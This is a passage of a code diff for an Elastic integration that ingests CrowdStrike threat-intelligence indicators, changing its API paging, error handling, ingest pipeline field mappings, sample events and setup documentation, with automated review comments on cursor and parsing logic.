"last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/Commodity" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + "last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/CredentialHarvesting" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + "last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/InformationStealer" + } + ], + "last_updated": "2023-11-21T06:18:01.000Z", + "malicious_confidence": "medium", + "malware_families": [ + "Trojan" + ], + "published_date": "2023-11-21T06:15:49.000Z", + "relations": [ + { + "created_date": "2023-11-21T06:15:39.000Z", + "id": "domain.com.xx", + "indicator": "domain.xx", + "last_valid_date": "2023-11-21T06:15:39.000Z", + "type": "domain" + }, + { + "created_date": "2023-11-21T06:15:39.000Z", + "id": "domain.xx.yy", 
+ "indicator": "domain.xx.fd", + "last_valid_date": "2023-11-21T06:15:39.000Z", + "type": "domain" + } + ], + "reports": [ + "reports" + ], + "targets": [ + "abc" + ], + "threat_types": [ + "Commodity", + "CredentialHarvesting", + "InformationStealer" + ], + "type": "url", + "value": "www.example.com", + "vulnerabilities": [ + "vuln" + ] + } + }, + "url": { + "extension": "com", + "original": "www.example.com", + "path": "www.example.com" + }, + "vulnerability": { + "category": [ + "vuln" + ] + } + }, + { + "@timestamp": "2023-11-21T06:18:11.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "threat" + ], + "id": "ip_address_123xxxx", + "kind": "enrichment", + "original": "{\"id\":\"ip_address_123xxxx\",\"indicator\":\"81.2.69.192\",\"type\":\"ip_address\",\"deleted\":true,\"published_date\":1700547349,\"last_updated\":1700547491,\"reports\":[\"reports\"],\"actors\":[\"SALTYSPIDER\"],\"malware_families\":[\"Trojan\"],\"kill_chains\":[\"Installation\",\"C2\"],\"ip_address_types\":[\"81.2.69.192\"],\"domain_types\":[\"domain.com\"],\"malicious_confidence\":\"low\",\"_marker\":\"10005df353d123235e4158c5c81f456f0\",\"labels\":[{\"name\":\"MaliciousConfidence/High\",\"created_on\":1700547395,\"last_valid_on\":1700547396},{\"name\":\"Malware/Mofksys\",\"created_on\":1700547369,\"last_valid_on\":1700547369},{\"name\":\"ThreatType/Commodity\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/CredentialHarvesting\",\"created_on\":1700547359,\"last_valid_on\":1700547359},{\"name\":\"ThreatType/InformationStealer\",\"created_on\":1700547359,\"last_valid_on\":1700547359}],\"relations\":[{\"id\":\"domain.com.xx\",\"indicator\":\"domain.xx\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339},{\"id\":\"domain.xx.yy\",\"indicator\":\"domain.xx.fd\",\"type\":\"domain\",\"created_date\":1700547339,\"last_valid_date\":1700547339}],\"targets\":[\"abc\"],\"threat_types\":[\"Commodity\",\"CredentialHarvest
ing\",\"InformationStealer\"]}", + "type": [ + "indicator" + ] + }, + "related": { + "ip": [ + "81.2.69.192" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "indicator": { + "confidence": "Low", + "ip": "81.2.69.192", + "name": "81.2.69.192", + "provider": "crowdstrike", + "type": "ipv4-addr" + } + }, + "ti_crowdstrike": { + "intel": { + "_marker": "10005df353d123235e4158c5c81f456f0", + "actors": [ + "SALTYSPIDER" + ], + "deleted": true, + "domain_types": [ + "domain.com" + ], + "id": "ip_address_123xxxx", + "ip_address_types": [ + "81.2.69.192" + ], + "kill_chains": [ + "Installation", + "C2" + ], + "labels": [ + { + "created_on": "2023-11-21T06:16:35.000Z", + "last_valid_on": "2023-11-21T06:16:36.000Z", + "name": "MaliciousConfidence/High" + }, + { + "created_on": "2023-11-21T06:16:09.000Z", + "last_valid_on": "2023-11-21T06:16:09.000Z", + "name": "Malware/Mofksys" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + "last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/Commodity" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + "last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/CredentialHarvesting" + }, + { + "created_on": "2023-11-21T06:15:59.000Z", + "last_valid_on": "2023-11-21T06:15:59.000Z", + "name": "ThreatType/InformationStealer" + } + ], + "last_updated": "2023-11-21T06:18:11.000Z", + "malicious_confidence": "low", + "malware_families": [ + "Trojan" + ], + "published_date": "2023-11-21T06:15:49.000Z", + "relations": [ + { + "created_date": "2023-11-21T06:15:39.000Z", + "id": "domain.com.xx", + "indicator": "domain.xx", + "last_valid_date": "2023-11-21T06:15:39.000Z", + "type": "domain" + }, + { + "created_date": "2023-11-21T06:15:39.000Z", + "id": "domain.xx.yy", + "indicator": "domain.xx.fd", + "last_valid_date": "2023-11-21T06:15:39.000Z", + "type": "domain" + } + ], + "reports": [ + "reports" + ], + "targets": [ + "abc" + ], + "threat_types": [ + 
"Commodity", + "CredentialHarvesting", + "InformationStealer" + ], + "type": "ip_address", + "value": "81.2.69.192" + } + } } ] } \ No newline at end of file diff --git a/packages/ti_crowdstrike/data_stream/intel/agent/stream/cel.yml.hbs b/packages/ti_crowdstrike/data_stream/intel/agent/stream/cel.yml.hbs index f4c780f9550..c716222fd22 100644 --- a/packages/ti_crowdstrike/data_stream/intel/agent/stream/cel.yml.hbs +++ b/packages/ti_crowdstrike/data_stream/intel/agent/stream/cel.yml.hbs 
@@ -27,67 +27,65 @@ auth.oauth2: state: initial_interval: {{initial_interval}} want_more: false - offset: 0 batch_size: {{batch_size}} redact: fields: ~ program: | ( !state.want_more ? - request("GET", state.url + "/intel/combined/indicators/v1?offset=0&limit=" + string(state.batch_size) + '&filter=last_updated:>"' + ( + request("GET", state.url + "/intel/combined/indicators/v1?offset=0&sort=_marker.asc&limit=" + string(state.batch_size) + '&filter=_marker:>"' + ( has(state.cursor) && has(state.cursor.last_timestamp) && state.cursor.last_timestamp != null ? - state.cursor.last_timestamp + '"' + string(int(state.cursor.last_timestamp)) : - (now - duration(state.initial_interval)).format(time_layout.RFC3339) + '"' - )) + string(int(now - duration(state.initial_interval))) + ) + '"') : - request("GET", state.url + "/intel/combined/indicators/v1?offset=" + string(state.offset) + "&limit=" + string(state.batch_size) + '&filter=last_updated:>"' + ( - has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? - state.cursor.first_timestamp + '"' - : - '"' - )) - ).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { - "events": body.resources.map(e, { - "message": e.encode_json(), - }), - "want_more": has(body.meta.pagination) && (int(state.offset) + body.resources.size()) < body.meta.pagination.total, - "offset": has(body.meta.pagination) && ((int(state.offset) + body.resources.size()) < body.meta.pagination.total) ? - int(state.offset) + int(body.resources.size()) - : - 0, - "url": state.url, - "batch_size": state.batch_size, - "cursor": { - "last_timestamp": ( - has(body.resources) && body.resources.size() > 0 ? - ( - has(state.cursor) && has(state.cursor.last_timestamp) && body.resources.map(e, e.last_updated).max() < state.cursor.last_timestamp ? - state.cursor.last_timestamp - : - body.resources.map(e, e.last_updated).max() - ) - : - ( - has(state.cursor) && has(state.cursor.last_timestamp) ? 
- state.cursor.last_timestamp - : - null - ) - ), - "first_timestamp": ( - has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? - ( - state.want_more ? - state.cursor.first_timestamp - : - state.cursor.last_timestamp - ) - : - (now - duration(state.initial_interval)).format(time_layout.RFC3339) - ), - }, - })) + request("GET", state.url + string(state.next_url[0])) + ).do_request().as(resp, + resp.StatusCode == 200 ? + bytes(resp.Body).decode_json().as(body, { + "events": body.resources.map(e, { + "message": e.encode_json(), + }), + "want_more": "Next-Page" in resp.Header, + "url": state.url, + "batch_size": state.batch_size, + "initial_interval": state.initial_interval, + "next_url": "Next-Page" in resp.Header ? resp.Header["Next-Page"] : "", + "cursor": { + "last_timestamp": ( + has(body.resources) && body.resources.size() > 0 ? + ( + has(state.cursor) && has(state.cursor.last_timestamp) && body.resources.map(e, e.last_updated).max() < state.cursor.last_timestamp ? + state.cursor.last_timestamp + : + body.resources.map(e, e.last_updated).max() + ) + : + ( + has(state.cursor) && has(state.cursor.last_timestamp) ? + state.cursor.last_timestamp + : + null + ) + ), + }, + }) + : + { + "events": { + "error": { + "code": string(resp.StatusCode), + "id": string(resp.Status), + "message": string(resp.Body) + }, + }, + "want_more": false, + "url": state.url, + "batch_size": state.batch_size, + "initial_interval": state.initial_interval, + } + ) tags: {{#if preserve_original_event}} - preserve_original_event diff --git a/packages/ti_crowdstrike/data_stream/intel/elasticsearch/ingest_pipeline/default.yml b/packages/ti_crowdstrike/data_stream/intel/elasticsearch/ingest_pipeline/default.yml index 9cdeb96d68d..e4e60c73b9e 100644 --- a/packages/ti_crowdstrike/data_stream/intel/elasticsearch/ingest_pipeline/default.yml +++ b/packages/ti_crowdstrike/data_stream/intel/elasticsearch/ingest_pipeline/default.yml 
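Review bot: The new `_marker:>` filter is fed from the stored cursor `last_timestamp`, which is still computed as `body.resources.map(e, e.last_updated).max()`; nothing in the program says why a `last_updated` epoch value is a valid lower bound for a `_marker` string, so a reader has to go to the vendor docs to trust the resume logic. A comment above the first `request(...)`, e.g. `// _marker values begin with the indicator's last_updated epoch seconds, so the stored last_updated is a safe lower bound when sorted by _marker.asc`, would make the cursor contract explicit — confirm the prefix assumption against the API documentation before wording it as fact. The paging branch also dereferences `state.next_url[0]` without checking that `next_url` is a non-empty list; it is safe only because `want_more` and `next_url` are both keyed on `"Next-Page" in resp.Header`, and that coupling is worth stating in the same comment. The `program:` block begins before this hunk.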
@@ -32,6 +32,7 @@ processors: - json: field: event.original tag: json_event_original + if: ctx.event?.original != null target_field: json on_failure: - append: 
@@ -79,41 +80,26 @@ processors: ignore_missing: true - foreach: field: ti_crowdstrike.intel.ip_address_types - tag: foreach_ti_crowdstrike_intel_ip_address_types + tag: foreach_ti_crowdstrike_intel_ip_address_types_append_into_related_ip if: ctx.ti_crowdstrike?.intel?.ip_address_types instanceof List + processor: + append: + field: related.ip + tag: append_ip_address_types_into_related_ip + value: '{{{_ingest._value}}}' + allow_duplicates: false + - foreach: + field: related.ip + tag: foreach_related_ip + if: ctx.related?.ip instanceof List processor: convert: field: _ingest._value - tag: convert_ti_crowdstrike_intel_ip_address_types + tag: convert_related_ip_to_ip type: ip - ignore_missing: true on_failure: - remove: field: _ingest._value - ignore_missing: true - - append: - field: error.message - value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - - foreach: - field: ti_crowdstrike.intel.ip_address_types - tag: foreach_ti_crowdstrike_intel_ip_address_types_append_into_threat_indicator_ip - if: ctx.ti_crowdstrike?.intel?.type != null && ctx.ti_crowdstrike.intel.type.contains('ip_address') && ctx.ti_crowdstrike?.intel?.ip_address_types instanceof List - processor: - append: - field: threat.indicator.ip - tag: append_intel_ip_address_types_into_threat_indicator_ip - value: '{{{_ingest._value}}}' - allow_duplicates: false - - foreach: - field: ti_crowdstrike.intel.ip_address_types - tag: foreach_ti_crowdstrike_intel_ip_address_types_append_into_related_ip - if: ctx.ti_crowdstrike?.intel?.ip_address_types instanceof List - processor: - append: - field: related.ip - tag: append_intel_ip_address_types_into_related_ip - value: '{{{_ingest._value}}}' - allow_duplicates: false - rename: field: json.kill_chains tag: rename_kill_chains 
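Review bot: The new `convert_related_ip_to_ip` step drops any `related.ip` entry that fails conversion without recording it: its `on_failure` only removes `_ingest._value`, whereas the removed `convert_ti_crowdstrike_intel_ip_address_types` step also appended to `error.message`. A malformed value in `ip_address_types` (now mapped as `keyword`, so no longer rejected at index time) will therefore vanish from `related.ip` silently, which makes enrichment gaps hard to diagnose. Consider keeping the previous `- append:` / `field: error.message` / `value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'` entry after the `remove` in that `on_failure` list. If other processors outside this hunk also append to `related.ip`, note that this foreach now converts and may remove their values too.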
@@ -324,6 +310,7 @@ processors: file_path: file hash_ion: file hash_md5: file + hash_sha1: file hash_sha256: file ip_address: ipv4-addr ip_address_block: ipv4-addr 
@@ -349,25 +336,54 @@ processors: target_field: ti_crowdstrike.intel.value ignore_missing: true - set: - field: file.hash.sha256 - tag: set_file_hash_sha256 + field: threat.indicator.file.hash.sha256 + tag: set_threat_indicator_file_hash_sha256 value: '{{{ti_crowdstrike.intel.value}}}' if: ctx.ti_crowdstrike?.intel?.type != null && ctx.ti_crowdstrike.intel.type.contains('hash_sha256') && ctx.ti_crowdstrike?.intel?.value != null - set: - field: file.hash.md5 - tag: set_file_hash_md5 + field: threat.indicator.file.hash.sha1 + tag: set_threat_indicator_file_hash_sha1 + value: '{{{ti_crowdstrike.intel.value}}}' + if: ctx.ti_crowdstrike?.intel?.type != null && ctx.ti_crowdstrike.intel.value != null && ctx.ti_crowdstrike.intel.type.contains('hash_sha1') + - set: + field: threat.indicator.file.hash.md5 + tag: set_threat_indicator_file_hash_md5 value: '{{{ti_crowdstrike.intel.value}}}' if: ctx.ti_crowdstrike?.intel?.type != null && ctx.ti_crowdstrike.intel.type.contains('hash_md5') && ctx.ti_crowdstrike?.intel?.value != null + - set: + field: threat.indicator.url.full + tag: set_threat_indicator_url_full + value: '{{{ti_crowdstrike.intel.value}}}' + if: ctx.ti_crowdstrike?.intel?.type != null && ctx.ti_crowdstrike.intel.type.contains('url') && ctx.ti_crowdstrike?.intel?.value != null + - uri_parts: + field: threat.indicator.url.full + tag: uri_parts_threat_indicator_url_full + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: threat.indicator.type tag: set_threat_indicator_type_to_ipv6_addr value: ipv6-addr if: ctx.ti_crowdstrike?.intel?.type != null && ctx.ti_crowdstrike.intel.type.contains('ip_address') && ctx.ti_crowdstrike?.intel?.value != null && ctx.ti_crowdstrike.intel.value.contains(":") + - convert: + field: 
ti_crowdstrike.intel.value + tag: convert_intel_value_to_ip_and_set_threat_indicator_ip + target_field: threat.indicator.ip + type: ip + if: ctx.ti_crowdstrike?.intel?.type != null && ctx.ti_crowdstrike.intel.type.contains('ip_address') && ctx.ti_crowdstrike?.intel?.value != '' + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - append: field: related.hash tag: append_intel_value_into_related_hash value: '{{{ti_crowdstrike.intel.value}}}' - if: ctx.ti_crowdstrike?.intel?.type != null && ['hash_ion', 'hash_md5', 'hash_sha256', 'hash_sha2'].contains(ctx.ti_crowdstrike.intel.type) + if: ctx.ti_crowdstrike?.intel?.type != null && ['hash_ion', 'hash_md5', 'hash_sha256', 'hash_sha1'].contains(ctx.ti_crowdstrike.intel.type) allow_duplicates: false - set: field: threat.indicator.name diff --git a/packages/ti_crowdstrike/data_stream/intel/fields/fields.yml b/packages/ti_crowdstrike/data_stream/intel/fields/fields.yml index f1a5d7a7df7..814fbb641a5 100644 --- a/packages/ti_crowdstrike/data_stream/intel/fields/fields.yml +++ b/packages/ti_crowdstrike/data_stream/intel/fields/fields.yml @@ -22,7 +22,7 @@ type: keyword description: A unique identifier for the Intel Indicator. - name: ip_address_types - type: ip + type: keyword description: Information related to IP address types associated with the Intel Indicator. - name: kill_chains type: keyword diff --git a/packages/ti_crowdstrike/data_stream/intel/manifest.yml b/packages/ti_crowdstrike/data_stream/intel/manifest.yml index 3c038ab2a83..38073114f8f 100644 --- a/packages/ti_crowdstrike/data_stream/intel/manifest.yml +++ b/packages/ti_crowdstrike/data_stream/intel/manifest.yml 
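Review bot: `uri_parts_threat_indicator_url_full` has no `target_field`, so the parsed parts land under top-level `url.*` rather than beside the `threat.indicator.url.full` it reads — the expected test output in this commit shows exactly that (`url.extension: com`, `url.original`/`url.path: www.example.com`), and a scheme-less value such as `www.example.com` is parsed as a path with no domain. Adding `target_field: threat.indicator.url` keeps the indicator's URL components in the ECS threat namespace, and `keep_original: false` would avoid duplicating `url.full` as `url.original`; whether scheme-less indicator values should be normalised before parsing deserves an explicit decision rather than accepting the path-only result. Separately, the added conditions are inconsistent with their neighbours: `set_threat_indicator_file_hash_sha1` uses `ctx.ti_crowdstrike.intel.value != null` while the sha256/md5 siblings use `ctx.ti_crowdstrike?.intel?.value != null`, and `convert_intel_value_to_ip_and_set_threat_indicator_ip` tests `!= ''` where every other processor tests `!= null`; aligning them on `ctx.ti_crowdstrike?.intel?.value != null` keeps the pipeline readable and its null handling uniform.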
@@ -1,5 +1,6 @@ title: Collect Intel logs from CrowdStrike Falcon Intelligence. type: logs +ilm_policy: logs-ti_crowdstrike.intel-default_policy streams: - input: cel title: Intel logs diff --git a/packages/ti_crowdstrike/data_stream/intel/sample_event.json b/packages/ti_crowdstrike/data_stream/intel/sample_event.json index 521934f64c2..243719823f2 100644 --- a/packages/ti_crowdstrike/data_stream/intel/sample_event.json +++ b/packages/ti_crowdstrike/data_stream/intel/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2023-11-21T06:16:01.000Z", "agent": { - "ephemeral_id": "91894e79-85f9-4358-897b-3e25722c7277", - "id": "3ac65ec0-d6ad-4ccb-ae51-f7d6cbd54eff", + "ephemeral_id": "ee250a38-ef6d-486c-a245-6d0dd0785a11", + "id": "803f2aef-a6c1-47c8-b64d-e484bb967db4", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.11.0" + "version": "8.12.0" }, "data_stream": { "dataset": "ti_crowdstrike.intel", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "3ac65ec0-d6ad-4ccb-ae51-f7d6cbd54eff", + "id": "803f2aef-a6c1-47c8-b64d-e484bb967db4", "snapshot": false, - "version": "8.11.0" + "version": "8.12.0" }, "event": { "agent_id_status": "verified", 
@@ -27,18 +27,13 @@ ], "dataset": "ti_crowdstrike.intel", "id": "hash_sha256_c98e1a7f563824cd448b47613743dcd1c853742b78f42b000192b83d", - "ingested": "2024-01-11T11:53:46Z", + "ingested": "2024-03-28T10:49:11Z", "kind": "enrichment", "original": "{\"_marker\":\"17005473618d17ae6353d123235e4158c5c81f25f0\",\"actors\":[\"SALTYSPIDER\"],\"deleted\":false,\"domain_types\":[\"abc.com\"],\"id\":\"hash_sha256_c98e1a7f563824cd448b47613743dcd1c853742b78f42b000192b83d\",\"indicator\":\"c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d\",\"ip_address_types\":[\"81.2.69.192\"],\"kill_chains\":[\"Installation\",\"C2\"],\"labels\":[{\"created_on\":1700547356,\"last_valid_on\":1700547360,\"name\":\"MaliciousConfidence/High\"},{\"created_on\":1700547359,\"last_valid_on\":1700547359,\"name\":\"Malware/Mofksys\"},{\"created_on\":1700547359,\"last_valid_on\":1700547359,\"name\":\"ThreatType/Commodity\"},{\"created_on\":1700547359,\"last_valid_on\":1700547359,\"name\":\"ThreatType/CredentialHarvesting\"},{\"created_on\":1700547359,\"last_valid_on\":1700547359,\"name\":\"ThreatType/InformationStealer\"}],\"last_updated\":1700547361,\"malicious_confidence\":\"high\",\"malware_families\":[\"Mofksys\"],\"published_date\":1700547356,\"relations\":[{\"created_date\":1700547339,\"id\":\"domain.com.yy\",\"indicator\":\"domain.ds\",\"last_valid_date\":1700547339,\"type\":\"domain\"},{\"created_date\":1700547339,\"id\":\"domain.xx.yy\",\"indicator\":\"domain.xx.fd\",\"last_valid_date\":1700547339,\"type\":\"domain\"}],\"reports\":[\"reports\"],\"targets\":[\"abc\"],\"threat_types\":[\"Commodity\",\"CredentialHarvesting\",\"InformationStealer\"],\"type\":\"hash_sha256\",\"vulnerabilities\":[\"vuln\"]}", "type": [ "indicator" ] }, - "file": { - "hash": { - "sha256": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d" - } - }, "input": { "type": "cel" }, 
@@ -59,6 +54,11 @@ "threat": { "indicator": { "confidence": "High", + "file": { + "hash": { + "sha256": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d" + } + }, "name": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d", "provider": "crowdstrike", "type": "file" diff --git a/packages/ti_crowdstrike/data_stream/ioc/agent/stream/cel.yml.hbs b/packages/ti_crowdstrike/data_stream/ioc/agent/stream/cel.yml.hbs index b4bec150a96..2a21ce7836b 100644 --- a/packages/ti_crowdstrike/data_stream/ioc/agent/stream/cel.yml.hbs +++ b/packages/ti_crowdstrike/data_stream/ioc/agent/stream/cel.yml.hbs 
@@ -47,47 +47,66 @@ program: | : '"' )) - ).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { - "events": body.resources.map(e, { - "message": e.encode_json(), - }), - "want_more": has(body.meta.pagination) && (int(state.offset) + body.resources.size()) < body.meta.pagination.total, - "offset": has(body.meta.pagination) && ((int(state.offset) + body.resources.size()) < body.meta.pagination.total) ? - int(state.offset) + int(body.resources.size()) - : - 0, - "url": state.url, - "batch_size": state.batch_size, - "cursor": { - "last_timestamp": ( - has(body.resources) && body.resources.size() > 0 ? - ( - has(state.cursor) && has(state.cursor.last_timestamp) && body.resources.map(e, e.modified_on).max() < state.cursor.last_timestamp ? - state.cursor.last_timestamp - : - body.resources.map(e, e.modified_on).max() - ) + ).do_request().as(resp, + resp.StatusCode == 200 ? + bytes(resp.Body).decode_json().as(body, { + "events": body.resources.map(e, { + "message": e.encode_json(), + }), + "want_more": has(body.meta.pagination) && (int(state.offset) + body.resources.size()) < body.meta.pagination.total, + "offset": has(body.meta.pagination) && ((int(state.offset) + body.resources.size()) < body.meta.pagination.total) ? + int(state.offset) + int(body.resources.size()) : - ( - has(state.cursor) && has(state.cursor.last_timestamp) ? - state.cursor.last_timestamp + 0, + "url": state.url, + "batch_size": state.batch_size, + "initial_interval": state.initial_interval, + "cursor": { + "last_timestamp": ( + has(body.resources) && body.resources.size() > 0 ? + ( + has(state.cursor) && has(state.cursor.last_timestamp) && body.resources.map(e, e.modified_on).max() < state.cursor.last_timestamp ? + state.cursor.last_timestamp + : + body.resources.map(e, e.modified_on).max() + ) : - null - ) - ), - "first_timestamp": ( - has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? - ( - state.want_more ? 
- state.cursor.first_timestamp + ( + has(state.cursor) && has(state.cursor.last_timestamp) ? + state.cursor.last_timestamp + : + null + ) + ), + "first_timestamp": ( + has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? + ( + state.want_more ? + state.cursor.first_timestamp + : + state.cursor.last_timestamp + ) : - state.cursor.last_timestamp - ) - : - (now - duration(state.initial_interval)).format(time_layout.RFC3339) - ), - }, - })) + (now - duration(state.initial_interval)).format(time_layout.RFC3339) + ), + }, + }) + : + { + "events": { + "error": { + "code": string(resp.StatusCode), + "id": string(resp.Status), + "message": string(resp.Body) + }, + }, + "want_more": false, + "offset": 0, + "url": state.url, + "batch_size": state.batch_size, + "initial_interval": state.initial_interval, + } + ) tags: {{#if preserve_original_event}} - preserve_original_event diff --git a/packages/ti_crowdstrike/data_stream/ioc/sample_event.json b/packages/ti_crowdstrike/data_stream/ioc/sample_event.json index fb5f554f9d7..b6ce8f6728e 100644 --- a/packages/ti_crowdstrike/data_stream/ioc/sample_event.json +++ b/packages/ti_crowdstrike/data_stream/ioc/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2023-11-01T10:22:23.106Z", "agent": { - "ephemeral_id": "1a68a49b-98f5-4aee-adf5-df243cdb4637", - "id": "3ac65ec0-d6ad-4ccb-ae51-f7d6cbd54eff", + "ephemeral_id": "ca4c5a70-0aa1-4cb3-867c-3c099798eef4", + "id": "803f2aef-a6c1-47c8-b64d-e484bb967db4", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.11.0" + "version": "8.12.0" }, "data_stream": { "dataset": "ti_crowdstrike.ioc", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "3ac65ec0-d6ad-4ccb-ae51-f7d6cbd54eff", + "id": "803f2aef-a6c1-47c8-b64d-e484bb967db4", "snapshot": false, - "version": "8.11.0" + "version": "8.12.0" }, "event": { "action": "detect-again", 
@@ -28,7 +28,7 @@ ], "dataset": "ti_crowdstrike.ioc", "id": "34874a88935860cf6yyfc856d6abb6f35a29d8c077195ed6291aa8373696b44", - "ingested": "2024-01-11T11:54:47Z", + "ingested": "2024-03-28T10:50:10Z", "kind": "enrichment", "original": "{\"action\":\"detect again\",\"applied_globally\":true,\"created_by\":\"abc.it@example.com\",\"created_on\":\"2023-11-01T10:22:23.10607613Z\",\"deleted\":false,\"description\":\"IS-38887\",\"expired\":false,\"from_parent\":false,\"id\":\"34874a88935860cf6yyfc856d6abb6f35a29d8c077195ed6291aa8373696b44\",\"metadata\":{\"filename\":\"High_Serverity_Heuristic_Sandbox_Threat.docx\"},\"modified_by\":\"example.it@ex.com\",\"modified_on\":\"2023-11-01T10:22:23.10607613Z\",\"platforms\":[\"windows\",\"mac\",\"linux\"],\"severity\":\"critical\",\"tags\":[\"IS-38887\"],\"type\":\"ipv4\",\"value\":\"81.2.69.192\"}", "type": [ diff --git a/packages/ti_crowdstrike/docs/README.md b/packages/ti_crowdstrike/docs/README.md index e1fd02bada6..3852df59040 100644 --- a/packages/ti_crowdstrike/docs/README.md +++ b/packages/ti_crowdstrike/docs/README.md @@ -46,6 +46,16 @@ This module has been tested against the **CrowdStrike Falcon Intelligence API Ve 2. Client Secret 3. Token url 4. API Endpoint url +5. Required scopes for each data stream : + + | Data Stream | Scope | + | ------------- | ------------- | + | Intel | read:intel | + | IOC | read:iocs | + +Follow the [documentation](https://www.crowdstrike.com/blog/tech-center/consume-ioc-and-threat-feeds/) for enabling the scopes from the CrowdStrike console. + +User should either have `admin` role or `Detection Exception Manager` role to access IOCs endpoint. Follow the [documentation](https://falcon.crowdstrike.com/documentation/page/f20650df/default-roles-reference) for managing user roles and permissions. ### Enabling the integration in Elastic: 
@@ -85,11 +95,11 @@ An example event for `intel` looks as following: { "@timestamp": "2023-11-21T06:16:01.000Z", "agent": { - "ephemeral_id": "91894e79-85f9-4358-897b-3e25722c7277", - "id": "3ac65ec0-d6ad-4ccb-ae51-f7d6cbd54eff", + "ephemeral_id": "ee250a38-ef6d-486c-a245-6d0dd0785a11", + "id": "803f2aef-a6c1-47c8-b64d-e484bb967db4", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.11.0" + "version": "8.12.0" }, "data_stream": { "dataset": "ti_crowdstrike.intel", @@ -100,9 +110,9 @@ An example event for `intel` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "3ac65ec0-d6ad-4ccb-ae51-f7d6cbd54eff", + "id": "803f2aef-a6c1-47c8-b64d-e484bb967db4", "snapshot": false, - "version": "8.11.0" + "version": "8.12.0" }, "event": { "agent_id_status": "verified", 
@@ -111,18 +121,13 @@ An example event for `intel` looks as following: ], "dataset": "ti_crowdstrike.intel", "id": "hash_sha256_c98e1a7f563824cd448b47613743dcd1c853742b78f42b000192b83d", - "ingested": "2024-01-11T11:53:46Z", + "ingested": "2024-03-28T10:49:11Z", "kind": "enrichment", "original": "{\"_marker\":\"17005473618d17ae6353d123235e4158c5c81f25f0\",\"actors\":[\"SALTYSPIDER\"],\"deleted\":false,\"domain_types\":[\"abc.com\"],\"id\":\"hash_sha256_c98e1a7f563824cd448b47613743dcd1c853742b78f42b000192b83d\",\"indicator\":\"c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d\",\"ip_address_types\":[\"81.2.69.192\"],\"kill_chains\":[\"Installation\",\"C2\"],\"labels\":[{\"created_on\":1700547356,\"last_valid_on\":1700547360,\"name\":\"MaliciousConfidence/High\"},{\"created_on\":1700547359,\"last_valid_on\":1700547359,\"name\":\"Malware/Mofksys\"},{\"created_on\":1700547359,\"last_valid_on\":1700547359,\"name\":\"ThreatType/Commodity\"},{\"created_on\":1700547359,\"last_valid_on\":1700547359,\"name\":\"ThreatType/CredentialHarvesting\"},{\"created_on\":1700547359,\"last_valid_on\":1700547359,\"name\":\"ThreatType/InformationStealer\"}],\"last_updated\":1700547361,\"malicious_confidence\":\"high\",\"malware_families\":[\"Mofksys\"],\"published_date\":1700547356,\"relations\":[{\"created_date\":1700547339,\"id\":\"domain.com.yy\",\"indicator\":\"domain.ds\",\"last_valid_date\":1700547339,\"type\":\"domain\"},{\"created_date\":1700547339,\"id\":\"domain.xx.yy\",\"indicator\":\"domain.xx.fd\",\"last_valid_date\":1700547339,\"type\":\"domain\"}],\"reports\":[\"reports\"],\"targets\":[\"abc\"],\"threat_types\":[\"Commodity\",\"CredentialHarvesting\",\"InformationStealer\"],\"type\":\"hash_sha256\",\"vulnerabilities\":[\"vuln\"]}", "type": [ "indicator" ] }, - "file": { - "hash": { - "sha256": "c98e192bf71a7f97563824cd448b47613743dcd1c853742b78f42b000192b83d" - } - }, "input": { "type": "cel" }, 
